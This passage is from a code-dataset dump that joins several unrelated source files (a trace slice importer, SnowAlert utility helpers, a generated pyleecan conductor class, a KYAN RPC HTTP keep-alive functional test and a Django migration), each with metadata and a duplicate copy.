if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
if end_thread_timestamp != None:
if curr_slice.thread_start == None:
raise ValueError(
'EndSlice with thread_timestamp called on open slice without ' +
'thread_timestamp')
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration == None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
def CompareSlices(s1, s2):
if s1.start == s2.start:
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
| true | true |
1c4a6de9d76149804cfadbfe3dc687ed9ec8343a | 1,570 | py | Python | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | from datetime import date, datetime
import inspect
from itertools import zip_longest
import json
import traceback
from types import GeneratorType
NO_FILL = object()
def groups_of(n, iterable, fillvalue=NO_FILL):
args = [iter(iterable)] * n
rets = zip_longest(*args, fillvalue=fillvalue)
return (tuple(l for l in ret if l is not NO_FILL) for ret in rets)
def format_exception(e):
return ''.join(traceback.format_exception(type(e), e, e.__traceback__))
def format_exception_only(e):
return ''.join(traceback.format_exception_only(type(e), e)).strip()
def json_dumps(obj):
def default_json_dumps(x):
if isinstance(x, Exception):
return {
"traceback": format_exception(x),
"exception": format_exception_only(x),
"exceptionName": x.__class__.__name__,
"exceptionArgs": x.args,
}
if isinstance(x, (date, datetime)):
return x.isoformat()
if hasattr(x, 'raw'):
return default_json_dumps(x.raw)
if callable(getattr(x, 'to_json', None)):
return json.parse(x.to_json())
if type(x) is GeneratorType:
return list(x)
return repr(x)
return json.dumps(obj, default=default_json_dumps)
def apply_some(f, **kwargs):
spec = inspect.getfullargspec(f)
defaults = dict(zip(reversed(spec.args), reversed(spec.defaults or ())))
passed_in = {arg: kwargs[arg] for arg in spec.args if arg in kwargs}
defaults.update(passed_in)
return f(**defaults)
| 27.068966 | 76 | 0.642675 | from datetime import date, datetime
import inspect
from itertools import zip_longest
import json
import traceback
from types import GeneratorType
NO_FILL = object()
def groups_of(n, iterable, fillvalue=NO_FILL):
args = [iter(iterable)] * n
rets = zip_longest(*args, fillvalue=fillvalue)
return (tuple(l for l in ret if l is not NO_FILL) for ret in rets)
def format_exception(e):
return ''.join(traceback.format_exception(type(e), e, e.__traceback__))
def format_exception_only(e):
return ''.join(traceback.format_exception_only(type(e), e)).strip()
def json_dumps(obj):
def default_json_dumps(x):
if isinstance(x, Exception):
return {
"traceback": format_exception(x),
"exception": format_exception_only(x),
"exceptionName": x.__class__.__name__,
"exceptionArgs": x.args,
}
if isinstance(x, (date, datetime)):
return x.isoformat()
if hasattr(x, 'raw'):
return default_json_dumps(x.raw)
if callable(getattr(x, 'to_json', None)):
return json.parse(x.to_json())
if type(x) is GeneratorType:
return list(x)
return repr(x)
return json.dumps(obj, default=default_json_dumps)
def apply_some(f, **kwargs):
spec = inspect.getfullargspec(f)
defaults = dict(zip(reversed(spec.args), reversed(spec.defaults or ())))
passed_in = {arg: kwargs[arg] for arg in spec.args if arg in kwargs}
defaults.update(passed_in)
return f(**defaults)
| true | true |
1c4a7040f025b55e78f539572f49045fceb53255 | 11,790 | py | Python | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# File generated according to Generator/ClassesRef/Machine/CondType12.csv
# WARNING! All changes made in this file will be lost!
"""Method code available at https://github.com/Eomys/pyleecan/tree/master/pyleecan/Methods/Machine/CondType12
"""
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from .Conductor import Conductor
# Import all class method
# Try/catch to remove unnecessary dependencies in unused method
try:
from ..Methods.Machine.CondType12.check import check
except ImportError as error:
check = error
try:
from ..Methods.Machine.CondType12.comp_surface_active import comp_surface_active
except ImportError as error:
comp_surface_active = error
try:
from ..Methods.Machine.CondType12.comp_height import comp_height
except ImportError as error:
comp_height = error
try:
from ..Methods.Machine.CondType12.comp_surface import comp_surface
except ImportError as error:
comp_surface = error
try:
from ..Methods.Machine.CondType12.comp_width import comp_width
except ImportError as error:
comp_width = error
try:
from ..Methods.Machine.CondType12.plot import plot
except ImportError as error:
plot = error
try:
from ..Methods.Machine.CondType12.plot_schematics import plot_schematics
except ImportError as error:
plot_schematics = error
from ._check import InitUnKnowClassError
from .Material import Material
class CondType12(Conductor):
"""parallel stranded conductor consisting of at least a single round wire"""
VERSION = 1
# Check ImportError to remove unnecessary dependencies in unused method
# cf Methods.Machine.CondType12.check
if isinstance(check, ImportError):
check = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method check: " + str(check))
)
)
else:
check = check
# cf Methods.Machine.CondType12.comp_surface_active
if isinstance(comp_surface_active, ImportError):
comp_surface_active = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface_active: "
+ str(comp_surface_active)
)
)
)
else:
comp_surface_active = comp_surface_active
# cf Methods.Machine.CondType12.comp_height
if isinstance(comp_height, ImportError):
comp_height = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_height: " + str(comp_height)
)
)
)
else:
comp_height = comp_height
# cf Methods.Machine.CondType12.comp_surface
if isinstance(comp_surface, ImportError):
comp_surface = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface: " + str(comp_surface)
)
)
)
else:
comp_surface = comp_surface
# cf Methods.Machine.CondType12.comp_width
if isinstance(comp_width, ImportError):
comp_width = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_width: " + str(comp_width)
)
)
)
else:
comp_width = comp_width
# cf Methods.Machine.CondType12.plot
if isinstance(plot, ImportError):
plot = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method plot: " + str(plot))
)
)
else:
plot = plot
# cf Methods.Machine.CondType12.plot_schematics
if isinstance(plot_schematics, ImportError):
plot_schematics = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method plot_schematics: "
+ str(plot_schematics)
)
)
)
else:
plot_schematics = plot_schematics
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
Wwire=0.015,
Wins_cond=0.015,
Nwppc=1,
Wins_wire=0,
Kwoh=0.5,
cond_mat=-1,
ins_mat=-1,
init_dict=None,
init_str=None,
):
"""Constructor of the class. Can be use in three ways :
- __init__ (arg1 = 1, arg3 = 5) every parameters have name and default values
for pyleecan type, -1 will call the default constructor
- __init__ (init_dict = d) d must be a dictionnary with property names as keys
- __init__ (init_str = s) s must be a string
s is the file path to load
ndarray or list can be given for Vector and Matrix
object or dict can be given for pyleecan Object"""
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "Wwire" in list(init_dict.keys()):
Wwire = init_dict["Wwire"]
if "Wins_cond" in list(init_dict.keys()):
Wins_cond = init_dict["Wins_cond"]
if "Nwppc" in list(init_dict.keys()):
Nwppc = init_dict["Nwppc"]
if "Wins_wire" in list(init_dict.keys()):
Wins_wire = init_dict["Wins_wire"]
if "Kwoh" in list(init_dict.keys()):
Kwoh = init_dict["Kwoh"]
if "cond_mat" in list(init_dict.keys()):
cond_mat = init_dict["cond_mat"]
if "ins_mat" in list(init_dict.keys()):
ins_mat = init_dict["ins_mat"]
# Set the properties (value check and convertion are done in setter)
self.Wwire = Wwire
self.Wins_cond = Wins_cond
self.Nwppc = Nwppc
self.Wins_wire = Wins_wire
self.Kwoh = Kwoh
# Call Conductor init
super(CondType12, self).__init__(cond_mat=cond_mat, ins_mat=ins_mat)
# The class is frozen (in Conductor init), for now it's impossible to
# add new properties
def __str__(self):
"""Convert this object in a readeable string (for print)"""
CondType12_str = ""
# Get the properties inherited from Conductor
CondType12_str += super(CondType12, self).__str__()
CondType12_str += "Wwire = " + str(self.Wwire) + linesep
CondType12_str += "Wins_cond = " + str(self.Wins_cond) + linesep
CondType12_str += "Nwppc = " + str(self.Nwppc) + linesep
CondType12_str += "Wins_wire = " + str(self.Wins_wire) + linesep
CondType12_str += "Kwoh = " + str(self.Kwoh) + linesep
return CondType12_str
def __eq__(self, other):
"""Compare two objects (skip parent)"""
if type(other) != type(self):
return False
# Check the properties inherited from Conductor
if not super(CondType12, self).__eq__(other):
return False
if other.Wwire != self.Wwire:
return False
if other.Wins_cond != self.Wins_cond:
return False
if other.Nwppc != self.Nwppc:
return False
if other.Wins_wire != self.Wins_wire:
return False
if other.Kwoh != self.Kwoh:
return False
return True
def __sizeof__(self):
"""Return the size in memory of the object (including all subobject)"""
S = 0 # Full size of the object
# Get size of the properties inherited from Conductor
S += super(CondType12, self).__sizeof__()
S += getsizeof(self.Wwire)
S += getsizeof(self.Wins_cond)
S += getsizeof(self.Nwppc)
S += getsizeof(self.Wins_wire)
S += getsizeof(self.Kwoh)
return S
def as_dict(self):
"""Convert this object in a json seriable dict (can be use in __init__)"""
# Get the properties inherited from Conductor
CondType12_dict = super(CondType12, self).as_dict()
CondType12_dict["Wwire"] = self.Wwire
CondType12_dict["Wins_cond"] = self.Wins_cond
CondType12_dict["Nwppc"] = self.Nwppc
CondType12_dict["Wins_wire"] = self.Wins_wire
CondType12_dict["Kwoh"] = self.Kwoh
# The class name is added to the dict for deserialisation purpose
# Overwrite the mother class name
CondType12_dict["__class__"] = "CondType12"
return CondType12_dict
def _set_None(self):
"""Set all the properties to None (except pyleecan object)"""
self.Wwire = None
self.Wins_cond = None
self.Nwppc = None
self.Wins_wire = None
self.Kwoh = None
# Set to None the properties inherited from Conductor
super(CondType12, self)._set_None()
def _get_Wwire(self):
"""getter of Wwire"""
return self._Wwire
def _set_Wwire(self, value):
"""setter of Wwire"""
check_var("Wwire", value, "float", Vmin=0)
self._Wwire = value
Wwire = property(
fget=_get_Wwire,
fset=_set_Wwire,
doc=u"""cf schematics, single wire diameter without insulation [m]
:Type: float
:min: 0
""",
)
def _get_Wins_cond(self):
"""getter of Wins_cond"""
return self._Wins_cond
def _set_Wins_cond(self, value):
"""setter of Wins_cond"""
check_var("Wins_cond", value, "float", Vmin=0)
self._Wins_cond = value
Wins_cond = property(
fget=_get_Wins_cond,
fset=_set_Wins_cond,
doc=u"""(advanced) cf schematics, winding coil insulation diameter [m]
:Type: float
:min: 0
""",
)
def _get_Nwppc(self):
"""getter of Nwppc"""
return self._Nwppc
def _set_Nwppc(self, value):
"""setter of Nwppc"""
check_var("Nwppc", value, "int", Vmin=1)
self._Nwppc = value
Nwppc = property(
fget=_get_Nwppc,
fset=_set_Nwppc,
doc=u"""cf schematics, winding number of random wires (strands) in parallel per coil
:Type: int
:min: 1
""",
)
def _get_Wins_wire(self):
"""getter of Wins_wire"""
return self._Wins_wire
def _set_Wins_wire(self, value):
"""setter of Wins_wire"""
check_var("Wins_wire", value, "float", Vmin=0)
self._Wins_wire = value
Wins_wire = property(
fget=_get_Wins_wire,
fset=_set_Wins_wire,
doc=u"""(advanced) cf schematics, winding strand insulation thickness [m]
:Type: float
:min: 0
""",
)
def _get_Kwoh(self):
"""getter of Kwoh"""
return self._Kwoh
def _set_Kwoh(self, value):
"""setter of Kwoh"""
check_var("Kwoh", value, "float", Vmin=0)
self._Kwoh = value
Kwoh = property(
fget=_get_Kwoh,
fset=_set_Kwoh,
doc=u"""winding overhang factor which describes the fact that random round wire end-windings can be more or less compressed (0.5 for small motors, 0.8 for large motors) - can be used to tune the average turn length (relevant if type_cond==1)
:Type: float
:min: 0
""",
)
| 32.125341 | 249 | 0.609669 |
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from .Conductor import Conductor
try:
from ..Methods.Machine.CondType12.check import check
except ImportError as error:
check = error
try:
from ..Methods.Machine.CondType12.comp_surface_active import comp_surface_active
except ImportError as error:
comp_surface_active = error
try:
from ..Methods.Machine.CondType12.comp_height import comp_height
except ImportError as error:
comp_height = error
try:
from ..Methods.Machine.CondType12.comp_surface import comp_surface
except ImportError as error:
comp_surface = error
try:
from ..Methods.Machine.CondType12.comp_width import comp_width
except ImportError as error:
comp_width = error
try:
from ..Methods.Machine.CondType12.plot import plot
except ImportError as error:
plot = error
try:
from ..Methods.Machine.CondType12.plot_schematics import plot_schematics
except ImportError as error:
plot_schematics = error
from ._check import InitUnKnowClassError
from .Material import Material
class CondType12(Conductor):
VERSION = 1
if isinstance(check, ImportError):
check = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method check: " + str(check))
)
)
else:
check = check
# cf Methods.Machine.CondType12.comp_surface_active
if isinstance(comp_surface_active, ImportError):
comp_surface_active = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface_active: "
+ str(comp_surface_active)
)
)
)
else:
comp_surface_active = comp_surface_active
if isinstance(comp_height, ImportError):
comp_height = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_height: " + str(comp_height)
)
)
)
else:
comp_height = comp_height
# cf Methods.Machine.CondType12.comp_surface
if isinstance(comp_surface, ImportError):
comp_surface = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface: " + str(comp_surface)
)
)
)
else:
comp_surface = comp_surface
if isinstance(comp_width, ImportError):
comp_width = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_width: " + str(comp_width)
)
)
)
else:
comp_width = comp_width
# cf Methods.Machine.CondType12.plot
if isinstance(plot, ImportError):
plot = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method plot: " + str(plot))
)
)
else:
plot = plot
if isinstance(plot_schematics, ImportError):
plot_schematics = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method plot_schematics: "
+ str(plot_schematics)
)
)
)
else:
plot_schematics = plot_schematics
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
Wwire=0.015,
Wins_cond=0.015,
Nwppc=1,
Wins_wire=0,
Kwoh=0.5,
cond_mat=-1,
ins_mat=-1,
init_dict=None,
init_str=None,
):
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "Wwire" in list(init_dict.keys()):
Wwire = init_dict["Wwire"]
if "Wins_cond" in list(init_dict.keys()):
Wins_cond = init_dict["Wins_cond"]
if "Nwppc" in list(init_dict.keys()):
Nwppc = init_dict["Nwppc"]
if "Wins_wire" in list(init_dict.keys()):
Wins_wire = init_dict["Wins_wire"]
if "Kwoh" in list(init_dict.keys()):
Kwoh = init_dict["Kwoh"]
if "cond_mat" in list(init_dict.keys()):
cond_mat = init_dict["cond_mat"]
if "ins_mat" in list(init_dict.keys()):
ins_mat = init_dict["ins_mat"]
# Set the properties (value check and convertion are done in setter)
self.Wwire = Wwire
self.Wins_cond = Wins_cond
self.Nwppc = Nwppc
self.Wins_wire = Wins_wire
self.Kwoh = Kwoh
# Call Conductor init
super(CondType12, self).__init__(cond_mat=cond_mat, ins_mat=ins_mat)
# The class is frozen (in Conductor init), for now it's impossible to
def __str__(self):
CondType12_str = ""
CondType12_str += super(CondType12, self).__str__()
CondType12_str += "Wwire = " + str(self.Wwire) + linesep
CondType12_str += "Wins_cond = " + str(self.Wins_cond) + linesep
CondType12_str += "Nwppc = " + str(self.Nwppc) + linesep
CondType12_str += "Wins_wire = " + str(self.Wins_wire) + linesep
CondType12_str += "Kwoh = " + str(self.Kwoh) + linesep
return CondType12_str
def __eq__(self, other):
if type(other) != type(self):
return False
if not super(CondType12, self).__eq__(other):
return False
if other.Wwire != self.Wwire:
return False
if other.Wins_cond != self.Wins_cond:
return False
if other.Nwppc != self.Nwppc:
return False
if other.Wins_wire != self.Wins_wire:
return False
if other.Kwoh != self.Kwoh:
return False
return True
def __sizeof__(self):
S = 0
S += super(CondType12, self).__sizeof__()
S += getsizeof(self.Wwire)
S += getsizeof(self.Wins_cond)
S += getsizeof(self.Nwppc)
S += getsizeof(self.Wins_wire)
S += getsizeof(self.Kwoh)
return S
def as_dict(self):
CondType12_dict = super(CondType12, self).as_dict()
CondType12_dict["Wwire"] = self.Wwire
CondType12_dict["Wins_cond"] = self.Wins_cond
CondType12_dict["Nwppc"] = self.Nwppc
CondType12_dict["Wins_wire"] = self.Wins_wire
CondType12_dict["Kwoh"] = self.Kwoh
CondType12_dict["__class__"] = "CondType12"
return CondType12_dict
def _set_None(self):
self.Wwire = None
self.Wins_cond = None
self.Nwppc = None
self.Wins_wire = None
self.Kwoh = None
super(CondType12, self)._set_None()
def _get_Wwire(self):
return self._Wwire
def _set_Wwire(self, value):
check_var("Wwire", value, "float", Vmin=0)
self._Wwire = value
Wwire = property(
fget=_get_Wwire,
fset=_set_Wwire,
doc=u"""cf schematics, single wire diameter without insulation [m]
:Type: float
:min: 0
""",
)
def _get_Wins_cond(self):
return self._Wins_cond
def _set_Wins_cond(self, value):
check_var("Wins_cond", value, "float", Vmin=0)
self._Wins_cond = value
Wins_cond = property(
fget=_get_Wins_cond,
fset=_set_Wins_cond,
doc=u"""(advanced) cf schematics, winding coil insulation diameter [m]
:Type: float
:min: 0
""",
)
def _get_Nwppc(self):
return self._Nwppc
def _set_Nwppc(self, value):
check_var("Nwppc", value, "int", Vmin=1)
self._Nwppc = value
Nwppc = property(
fget=_get_Nwppc,
fset=_set_Nwppc,
doc=u"""cf schematics, winding number of random wires (strands) in parallel per coil
:Type: int
:min: 1
""",
)
def _get_Wins_wire(self):
return self._Wins_wire
def _set_Wins_wire(self, value):
check_var("Wins_wire", value, "float", Vmin=0)
self._Wins_wire = value
Wins_wire = property(
fget=_get_Wins_wire,
fset=_set_Wins_wire,
doc=u"""(advanced) cf schematics, winding strand insulation thickness [m]
:Type: float
:min: 0
""",
)
def _get_Kwoh(self):
return self._Kwoh
def _set_Kwoh(self, value):
check_var("Kwoh", value, "float", Vmin=0)
self._Kwoh = value
Kwoh = property(
fget=_get_Kwoh,
fset=_set_Kwoh,
doc=u"""winding overhang factor which describes the fact that random round wire end-windings can be more or less compressed (0.5 for small motors, 0.8 for large motors) - can be used to tune the average turn length (relevant if type_cond==1)
:Type: float
:min: 0
""",
)
| true | true |
1c4a704defde2f07302fed79149db9bb0af194e7 | 4,779 | py | Python | test/functional/interface_http.py | kyancoin/KYAN | 39174bd5add8a41a82ca53e5f1372e4c0a58f447 | [
"MIT"
] | 6 | 2020-09-17T04:29:33.000Z | 2021-08-08T16:39:10.000Z | test/functional/interface_http.py | sapphire-pt/KYAN | 0c534d9a10a8d07d3707c74e6ea93477857b5ec7 | [
"MIT"
] | 22 | 2020-07-31T20:01:16.000Z | 2020-08-13T09:58:21.000Z | test/functional/interface_http.py | kyancoin/KYAN | 39174bd5add8a41a82ca53e5f1372e4c0a58f447 | [
"MIT"
] | 4 | 2020-09-17T22:32:25.000Z | 2022-01-12T20:49:24.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because kyanited should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| 43.844037 | 108 | 0.632768 |
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) assert(conn.sock!=None) conn.close()
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) assert(conn.sock!=None) conn.close()
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None)
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| true | true |
1c4a70cf289dd3128b34f541efdf029286cbd0d2 | 1,070 | py | Python | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 5 | 2019-08-29T13:55:47.000Z | 2021-11-15T08:30:33.000Z | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 295 | 2019-08-19T12:40:29.000Z | 2022-01-24T14:03:20.000Z | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 7 | 2020-05-27T06:28:48.000Z | 2021-11-17T10:00:54.000Z | # Generated by Django 2.2.4 on 2019-10-05 07:31
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('data', '0011_auto_20191004_1505'),
]
operations = [
migrations.RemoveField(
model_name='practice',
name='pest_multipliers',
),
migrations.AddField(
model_name='practice',
name='pest_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
migrations.RemoveField(
model_name='practice',
name='weed_multipliers',
),
migrations.AddField(
model_name='practice',
name='weed_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
]
| 31.470588 | 155 | 0.636449 |
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('data', '0011_auto_20191004_1505'),
]
operations = [
migrations.RemoveField(
model_name='practice',
name='pest_multipliers',
),
migrations.AddField(
model_name='practice',
name='pest_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
migrations.RemoveField(
